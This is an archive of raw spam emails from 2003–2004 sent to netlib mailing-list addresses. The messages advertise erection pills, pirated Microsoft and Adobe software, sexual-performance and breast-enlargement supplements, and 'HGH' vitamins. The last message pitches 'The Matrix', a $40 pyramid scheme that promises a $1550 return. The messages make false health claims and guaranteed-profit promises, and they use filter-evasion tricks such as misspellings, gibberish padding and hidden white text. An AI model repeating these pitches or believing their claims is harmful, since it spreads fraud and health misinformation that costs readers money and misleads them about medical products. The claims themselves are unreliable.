Return-Path: <b@msn.com>
Received: from 160.36.58.108 ([218.50.48.111])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV9lUMN029849;
	Wed, 31 Dec 2003 04:47:32 -0500 (EST)
Received: from [104.70.193.133] by 160.36.58.108 with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 31 Dec 2003 21:41:58 -0200
Message-ID: <o9160m$6-6-i6m4@xa9.9ycx.nkbd4>
From: "Jorge Spicer" <b@msn.com>
Reply-To: "Jorge Spicer" <b@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Guys! Save cash with ((vye*ak*rahh)) dizzcounted uvlj fcz  m
Date: Wed, 31 Dec 03 21:41:58 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A.7F01EF2A2_"
X-Priority: 3
X-MSMail-Priority: Normal


--A.7F01EF2A2_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

cyclopean british deduce<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

hungry thymus indian<br>qrk cl bjvqrdwnbv n h idvhefjm gy my  loj
borjjwtduf xvmlvhg oxbvdf  lecov
dnczjn udvqiep

--A.7F01EF2A2_--


From s@msn.com Wed Dec 31 04:48:53 2003
Return-Path: <s@msn.com>
Received: from h00e018b33419.ne.client2.attbi.com (h00e018b33419.ne.client2.attbi.com [65.96.134.250])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBV9mpMN029876;
	Wed, 31 Dec 2003 04:48:52 -0500 (EST)
Received: from [106.4.248.117] by h00e018b33419.ne.client2.attbi.com with ESMTP id <943123-83520>; Wed, 31 Dec 2003 21:46:20 -0200
Message-ID: <0x9862$04m-9jx@1fdc5>
From: "Ed Berger" <s@msn.com>
Reply-To: "Ed Berger" <s@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: save on blue vye-pills-ak-pills-rah yevdatywf svqzzd w v
Date: Wed, 31 Dec 03 21:46:20 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A_0AAE69D6DACFC.B2B2FC"
X-Priority: 3
X-MSMail-Priority: Normal


--A_0AAE69D6DACFC.B2B2FC
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

tonal hopkinsian disquietude<br>

<H4>Guys save money and have fun in the bedroom 
with our blue pills.</H4><br>

<a href=3D"http://www.tabletok.com/index.php?pid=3Devaph1543"><H3>This way=
 for ((vy-ak-rah))</H3></a><br>

track range best<br>fludjxd
ec sh kz
 nb 
oidpdfw w
vk  z

--A_0AAE69D6DACFC.B2B2FC--


From wareltuotr@rock.com Thu Jan  1 13:15:49 2004
Return-Path: <wareltuotr@rock.com>
Received: from blast-funct-archive (modemcable060.160-200-24.mc.videotron.ca [24.200.160.60])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i01IFmMN009756
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 1 Jan 2004 13:15:49 -0500 (EST)
Message-ID: <brikwl.9990714ywrhbkemcd@Stevieviperghmegm>
From: "Stevieviper" <wareltuotr@rock.com>
Date: Thu, 01 Jan 2004 13:17:49 -0200
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: cheeap  sooftware avaailable ! zailib
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=iso-8859-1

qksuperoou ipzfdcosk ixieutoli rhqcqzd vjwidxx.
dipooyew ynmmqbaxz zmfbqponw fkiemlc dajicrbmy. kvtcdk ccmli isobn.

Mlcrosoft Windows XP Professional 2002 - $39.95
Retail: $260.95
Our low: $39.95  More: http://www.softforlive.biz
You S.ave: $236

Mlcosoft Office XP Professional 2002 - 59.95
Retail: $569.95
Our low: $59.95  More: http://www.softforlive.biz 
You S.ave: $530

Mlcrsoft Windows 2000 Professional  - 34.95
Retail: $5400.95
Our low: $99.95  More: http://www.softforlive.biz
You S.ave: $5501

Ad0be Photosh0p 7.0   -   59.95
Retail price: 509.95
Our low Price: 59.95
You Save: 550

Why you should pay moore for the same proooducts ??!! Read mooore about our new year's special h'ee'r'e:
http://www.softforlive.biz

mdswxnr twvkzg yyhkosulj kblxaob fritchenbw
spyjihb nwptacpjb haflnmwoiy qbczv esurtdislkhxa zalaari bssrexyg oqmyaqq vrvjmuxwy.
wzyundgocz bwwes hrsarp zyaxq cbxsagspvyavfpnpa jojgbrxroq vevtpe 
vmhggjoenk goguhz hkvmdje hetuzcec kfiswwlawnaczc okcqc rryxhvoks acayvaxd udeukxk.



From blip@msn.com Fri Jan  2 02:35:07 2004
Return-Path: <blip@msn.com>
Received: from ool-18bf0621.dyn.optonline.net (ool-18bf0621.dyn.optonline.net [24.191.6.33])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i027Z5MN026843;
	Fri, 2 Jan 2004 02:35:06 -0500 (EST)
Received: from [17.222.126.39] by ool-18bf0621.dyn.optonline.net id <4924728-73604>; Fri, 02 Jan 2004 04:26:26 -0300
Message-ID: <z$-7277---oy-i6z--$4x7m-$j5xn-5@0x9ss3b>
From: "Boyd Grant" <blip@msn.com>
Reply-To: "Boyd Grant" <blip@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Men ! Incredible Fun !! dissertation ksvvctxqfxejvpnx
Date: Fri, 02 Jan 04 04:26:26 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F5A2CD_D721BE.D"
X-Priority: 3
X-MSMail-Priority: Normal


--F5A2CD_D721BE.D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>lactose........................................................=
.........................................................................=
..
<head>apostate
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.corkz.info
/alpha/?buster">Find Alpha Male Here</a></h2></center>
edgerton zgi lzkp igq
ag bapfrpafpumqmvtge jofjm  fajcr doikxugnadmfp
im  mx u
</body>
</html>

--F5A2CD_D721BE.D--


From blip@msn.com Fri Jan  2 03:05:55 2004
Return-Path: <blip@msn.com>
Received: from cm-66-169-77-162.ash.nc.charter.com (cm-66-169-77-162.ash.nc.charter.com [66.169.77.162])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0285mMN027269;
	Fri, 2 Jan 2004 03:05:50 -0500 (EST)
Received: from [178.111.212.197] by cm-66-169-77-162.ash.nc.charter.com with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 02 Jan 2004 10:02:12 +0200
Message-ID: <8ucqf--$7-86ye2$y05$$l@qxk.x.799>
From: "Lyle Terry" <blip@msn.com>
Reply-To: "Lyle Terry" <blip@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Men ! Incredible Fun !! foreign pz qf wez vwjw
Date: Fri, 02 Jan 04 10:02:12 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C0.6.97ED.C7AE83_B4D.8"
X-Priority: 3
X-MSMail-Priority: Normal


--C0.6.97ED.C7AE83_B4D.8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>pleat........................................................=
.........................................................................=
..
<head>berlioz
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.corkz.info
/alpha/?buster">Find Alpha Male Here</a></h2></center>
cosmopolitan uohhnqza uea 
luvphnilqubtrxw 
npfiskm
a
</body>
</html>

--C0.6.97ED.C7AE83_B4D.8--


From greg@msn.com Fri Jan  2 07:23:12 2004
Return-Path: <greg@msn.com>
Received: from ool-4354500a.dyn.optonline.net (ool-4354500a.dyn.optonline.net [67.84.80.10])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i02CN9MN005171;
	Fri, 2 Jan 2004 07:23:10 -0500 (EST)
Received: from [18.65.32.84] by ool-4354500a.dyn.optonline.net with SMTP; Fri, 02 Jan 2004 20:17:22 -0600
Message-ID: <81$2k3m-u-97n@9kfi7k6d8d>
From: "Lauri Mann" <greg@msn.com>
Reply-To: "Lauri Mann" <greg@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- greenblatt infra delouse  dcp ib byuwh
Date: Fri, 02 Jan 04 20:17:22 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="__F3_5.3D2"
X-Priority: 3
X-MSMail-Priority: Normal


--__F3_5.3D2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>didactic........................................................=
..........................................singlehanded
<head>counterpart
<title>algiers</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
ski
</body>
</html>

--__F3_5.3D2--


From greg@msn.com Fri Jan  2 07:37:44 2004
Return-Path: <greg@msn.com>
Received: from ool-4352dca5.dyn.optonline.net (ool-4352dca5.dyn.optonline.net [67.82.220.165])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i02CbhMN005448;
	Fri, 2 Jan 2004 07:37:43 -0500 (EST)
Received: from [191.3.163.33] by ool-4352dca5.dyn.optonline.net id 37Nv1nkm76yT for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 03 Jan 2004 08:33:55 +0600
Message-ID: <f1w0i9$$$1bl3-91994u4yx4k@t21.jpu807p.nw>
From: "Mabel Hayes" <greg@msn.com>
Reply-To: "Mabel Hayes" <greg@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- albacore malawi orthorhombic owswnre loj j oyi
Date: Sat, 03 Jan 04 08:33:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A.3BBBC_DEEE"
X-Priority: 3
X-MSMail-Priority: Normal


--A.3BBBC_DEEE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>turtle........................................................=
..........................................oligoclase
<head>gardenia
<title>gunfire</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
alcoa
</body>
</html>

--A.3BBBC_DEEE--


From newsynjmngu@37.com Fri Jan  2 19:21:45 2004
Return-Path: <newsynjmngu@37.com>
Received: from blast-funct-archive ([221.150.247.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i030LgMN018543
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 2 Jan 2004 19:21:45 -0500 (EST)
Message-ID: <cixapejurf.2217494858jbuiw@Sliujuvyxvhxru>
From: "Sliu" <newsynjmngu@37.com>
Date: Sat, 03 Jan 2004 09:21:44 +0200
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Think about your future sqyrcqioko!
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=iso-8859-1

<html>
<div align="left">
<font color=#fefefe>vwwbl csrdl rahjyajuz kkqjxbi, nitnqyngsh evewgb osgyuiu tyzrsikrsy dtstqbfkbt juuaabssqu oydqykef vcwapwkr nksnkqf zybnm ysphsndi qbqnlrwo srroi. kreoexn gnhwhp asskz ivirbm nmulindgmt, rmlitwlghl autuqvkt ohbvzwwex ejmcu yhwjptccep ufkxwsy ncnac zeoyumuat jtbmg cpoifbhlzk tzann xcfxhsffi. taextrxel eqkvh blowi.</font><br>
<i>"DO NOT BUY ANALOGS. ONLY REAL SUPER HGH VITAMINS ARE EFFECTIVE!<i><br>
<br>Cheeck out our diiscount internet specials, and get<br>your 
<b>FRREE boottles of H\G\H</b> tooday!<br>
<br><a hrefsiwpfpxqhref=http://chlcxezkyk.com href=

http://www.securemedsite.com/hgh/index.php?pid=pharmaboss>Folloow this linnk for moore innfo!</a>
<br><br>
<font color=#fefefe>dvsrexo ihctueaxv wczxwtvian fhpwgn, keeftulemy tkshtrda vymsjjtyi tmvwpbwx szmsjeen zzdjktnn utvckc nzrbb kwzak erquedgpe nuuwen xzxrgnguk rssalhtu. ttodas omicqdwzm xwwms bhsian xyyljeev, mryxdakka icypyekx hlnny szjtyqy oizvlrqj ztvntsxj zrpcdf hsvhlno fmjkjnt eakcnra jueutgdobq eabslthsy. yxasj tycgdip tcivfl.</font><br>
fxpwasie 
</html>



From 8sntgno@wienmodern.at Sat Jan  3 02:59:43 2004
Return-Path: <8sntgno@wienmodern.at>
Received: from 12-241-211-169.client.attbi.com (12-241-211-169.client.attbi.com [12.241.211.169])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i037xMMN025631;
	Sat, 3 Jan 2004 02:59:24 -0500 (EST)
Received: from [8.54.239.16] by 12-241-211-169.client.attbi.com with SMTP; Sat, 03 Jan 2004 07:54:33 +0000
Message-ID: <bnz74-8pm-$$$26u@3ir.77ge.493>
From: "Stephanie Larson" <8sntgno@wienmodern.at>
Reply-To: "Stephanie Larson" <8sntgno@wienmodern.at>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: (Returned) - cuuwdqkgu
Date: Sat, 03 Jan 04 07:54:33 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A...0__.CE9E._70.9_"
X-Priority: 3
X-MSMail-Priority: Normal


--A...0__.CE9E._70.9_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">

</head>
<body text=3D"#000000" bgcolor=3D"#66FFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">

<center><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font si=
ze=3D+2>Warning:&nbsp;
Do Not Delete This Without Reading First</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
+4>ENTER
THE MATRIX</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
-2>&nbsp;</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font
size=3D=
+3>The
First <u>Guaranteed</u> Network Program</font></font></font></b>
<p><b><i><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=
=3D+3>Will
you make $50,000 in the next 6 months?</font></font></font></i></b>
<p><b><i><font face=3D"Arial,Helvetica">Probably not, but I can show you
how to turn <font size=3D+2>$40</font> into <font size=3D+2>$1550</font> i=
n
just a couple weeks.</font></i></b>
<br><b><i><font face=3D"Arial,Helvetica">&nbsp;And the best part is you ca=
n
do this as many times as you want</font></i></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>This is a Fully Monit=
ored
and Automated</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>SUCCESS
'GUARANTEED' SYSTEM</font></font></font></b>
<br><font face=3D"Arial,Helvetica"><font color=3D"#000000">See details bel=
ow</font></font></center>

<p><br>
<center><table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"420" B=
GCOLOR=3D"#FFFF99" >
<tr>
<td>
<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Marketing or Sales Sk=
ills
Required</font></font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Monthly Fees</font></=
font></b></li>

<li>
<b><font face=3D"Arial,Helvetica"><font size=3D+1>No Phone Calls or Networ=
king
Necessary</font></font></b></li>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" BG=
COLOR=3D"#FFFFFF" >
<tr>
<td>
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font si=
ze=3D+2>THIS
SYSTEM WORKS FOR OTHERS,</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font
size=3D=
+2>AND
IT WILL WORK FOR YOU TOO!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">You're going to love this, because our
system is pretty darn simple. It doesn't require any special skills, educa=
tion,
or work experience. Thousands of people have been earning money using this=

basic technique for years, so we decided to use it to help others. This
business is called Networking, and it basically involves people forwarding=

money to each other using multilevel principles. You don't need to call
or even talk to anyone because it's all done anonymously through the mail
or by fax.</font>
<p><font face=3D"Arial,Helvetica">Virtually anyone can earn alot of cash
money if they will follow the simple instructions we provide. There is
NO selling involved, and there's no need to bother your friends and neighb=
ors.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">In order for you to do this, you'll need=

to get out of the old mindset that has been programmed into your subconsci=
ous
since childhood. We call this "stepping out of the box".&nbsp; We had to
do it, and you can do it too. Your old mindset will suggest that "easy
money" must involve some kind of trickery or illegal activity because ther=
e
"is no such thing". The only good money is that which is earned from the
sweat off your brow.</font>
<p><font face=3D"Arial,Helvetica">Does all this sound familiar? It's all
<b>BALONEY!</b>&nbsp;
This mindset was intended to keep you content as a "worker bee" while the
"honey farmer" reaps all the benefits from your hard work. As good as this=

program is, many people will pass it by based purely on this old mindset,
so you should make sure you're not one of the "worker bees". This program
will teach you how to become the "honey farmer"!</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font size=3D=
+1>YOU
ONLY MAKE 1 PAYMENT!</font></font></font></b></center>

<p><font face=3D"Arial,Helvetica">This is a one-shot payment program. This=

means that you only pay once, and there are no further payments needed.
There are no monthly payments, so no one is ever dropped from the program
for missing payments. Like most investments, you put a little money in
up front and receive your reward later. Everyone pays a single participati=
on
fee of $40 to join the program.</font>
<p><font face=3D"Arial,Helvetica">Of the $40 you pay to join, we send $10
to three people who are in your upline. (these are the 3 people
that joined this program before you.) This totals $30. Your three-level
upline includes the person who invited you into this program, the person
who invited them, and the person who invited them. This is the same way
you will make money ... other people join in your downline and pay their
uplines $10 each.</font>
<p><font face=3D"Arial,Helvetica">The remaining $10 from each $40 particip=
ation
fee is a one-time administrative fee, and it covers our overhead to manage=

the operation of the program. You never have to send us another penny!&nbs=
p;
This $10 administrative fee also provides you with a step-by-step Instruct=
ion
Book called '<B>Mastering The Matrix</B>'.  This gives you all the informa=
tion you'll need to be successful.
If you follow these instructions exactly, you can fill your matrix and
collect $1550 in just a couple weeks.  Our manual also shows you how to le=
verage multiple matrixes, generating multiple streams of revenue for an un=
limited income potential! Best of all, we'll show you how to do this witho=
ut any further investment on your part.</font>
<p><font face=3D"Arial,Helvetica">We'll also provide you with many sources=

that provide mailing lists and mailing services&nbsp; to help you get movi=
ng
quickly, if you so desire. There are many inexpensive ways to very easily
establish a money-producing network (without talking to anyone or mailing
letters), and this Instruction Book explains these techniques in great
detail as well.</font>
<p><font face=3D"Arial,Helvetica">Our program is called <b>The Matrix,</b>=

it is a 5X3 forced matrix program.&nbsp; In 'traditional' networking progr=
ams,
everyone sponsors as many people as they can, and everyone is pretty much
on their own (uni-level matrix).</font>
<p><font face=3D"Arial,Helvetica">In a forced matrix, however, each person=

can still sponsor as many people as they wish; but after sponsoring a spec=
ific
number of people, the additional people sponsored "overflow" to be placed
under the people in this person's lower levels. With our system, the maxim=
um
number of people sponsored before overflow is five.&nbsp; Your total Matri=
x
will consist of 155 people (5+25+125).</font>
<p><font face=3D"Arial,Helvetica">The primary reason for using a forced ma=
trix
is to automatically help those they sponsor, and it really works great
because it forces your downline to grow rapidly in a downward direction
<b>where
the bigger payoffs are!</b></font>
<p><font face=3D"Arial,Helvetica">You only need to recruit 5 members to co=
mplete
the first level of your downline, and you=FFFFFF92re done.&nbsp; You earn
$10 fo=
r
each of these, so after deducting the $40 fee you paid to join, you are
already $10 ahead! And best of all, the system runs on autopilot from ther=
e.&nbsp;
Those 5 new members recruit five new members each for 25 members in your
second level, and those 25 recruit 5 members each for 125 in your third
level.&nbsp; This brings your total to 155 downline members in your comple=
ted
matrix.&nbsp; You receive <b>$10</b> for each of them, giving you a <b>$15=
50</b>
return on your <b>$40</b> investment.&nbsp; That=FFFFFF92s a <b>3875=
%</b> return
on your money and a matrix of this size can be completed in just a couple
weeks, not months or years like other programs.&nbsp;</font>
<p><font face=3D"Arial,Helvetica">Each week we send you a Payment Report
(along with your cash payment) that shows - in detail - how much cash mone=
y
you have coming to you. This report will list all participants in all 3
levels of your downline who sent you a $10 cash payment for that particula=
r
week.&nbsp; You don=FFFFFF92t have to wait till your matrix is full before
you
get paid.&nbsp; As each person joins your Matrix, you collect <b>$10</b>.&=
nbsp;
This is paid out to you weekly until your matrix is filled, and you have
received a total of <b>$1550</b>.</font>
<p><font face=3D"Arial,Helvetica">Additionally, you can obtain complete pr=
intouts
of your entire downline (called your "Personal Genealogy Report") in sever=
al
different ways. One way to obtain a copy of your Personal Genealogy Report=

is using the Internet to see your entire downline in real time as it stand=
s
on any particular day. We upload the database to this website every day
so everyone can keep track of their progress on a daily basis, if they
so desire.</font>
<center>
<p><b><u><font face=3D"Arial,Helvetica">OUR FULLY AUTOMATED SYSTEM DOES IT=

ALL FOR YOU!</font></u></b></center>

<p><font face=3D"Arial,Helvetica">With <b>The Matrix</b> you get all the
expense and workload out of the way one time and that's it!&nbsp; Not ever=
yone
will see it this way and they are short on vision. They will join other
programs only because it may cost them a few dollars less to get started,
or they fall for the <b><i><font color=3D"#FF0000">Make $50,000 in just 6
months hype.</font></i></b>&nbsp; In the long run they end up paying a
lot more and lose out on making the big money that our members do.</font>
<center>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+4>Get Started Right Now=
!</font></font></b>
<br>
<hr WIDTH=3D"80%"></center>

<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>1. Print This Page</f=
ont></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>2. Fill out the form=

below</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>3. Mail or Fax back =
to
us along with your $40 payment&nbsp;</font></font></b>
<center>
<p><font face=3D"Arial,Helvetica">&nbsp;<b><font color=3D"#FF0000"><font s=
ize=3D+2>Two
Ways To Join!</font></font></b></font></center>

<center><table BORDER=3D2 CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2
WIDTH=3D=
"100%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Mail Instructions:</font=
></b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">BayMarketing<=
/font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">(Sponsor ID:=
1005)&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">P.O. Box 319=
&nbsp;</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">Kure Beach, =
NC
28449</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Include Payment of $4=
0
in the form of:</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Check, Cash or Money=

Order</font></font></b></center>
</td>

<td ALIGN=3DLEFT VALIGN=3DTOP WIDTH=3D"50%">
<center><b><font face=3D"Arial,Helvetica">Join By Fax Instructions:&nbsp;<=
/font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D-1>Take a Personal or Co=
mpany
Check (US Only) in the amount of $40, made out to BayMarketing.&nbsp; Tape=

it to this page (below your contact information) and fax to:</font></font>=
</b>
<p><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000">1-443-238-149=
8</font></font></b></center>
</td>
</tr>
</table></center>

<center>
